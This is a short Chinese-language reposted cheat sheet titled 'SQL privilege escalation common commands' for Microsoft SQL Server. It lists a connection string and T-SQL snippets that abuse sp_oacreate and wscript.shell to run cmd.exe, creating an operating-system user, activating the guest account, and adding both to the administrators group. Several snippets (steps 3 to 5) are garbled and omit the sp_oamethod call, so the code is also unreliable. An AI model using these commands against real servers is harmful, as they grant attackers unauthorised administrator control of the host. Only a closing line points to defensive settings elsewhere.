SQL 提权 常用命令

前端之家收集整理的这篇文章主要介绍了SQL 提权 常用命令前端之家小编觉得挺不错的,现在分享给大家,也给大家做个参考。

1、连接数据库


driver={sql Server};server=服务器IP;uid=用户名;pwd=密码;database=数据库

2、添加新用户


declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'

3、把用户加到管理组


declare @shell int exec sp_oacreate 'wscript.shell','c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'

4、激活GUEST用户


declare @shell int exec sp_oacreate 'wscript.shell','c:\windows\system32\cmd.exe /c net user guest /active:yes'

5、把Guest加到管理组


declare @shell int exec sp_oacreate 'wscript.shell','c:\windows\system32\cmd.exe /c net localgroup Administrators Guest /add'
关于防范方法,可以参考编程之家服务器安全设置栏目。

猜你在找的MsSQL相关文章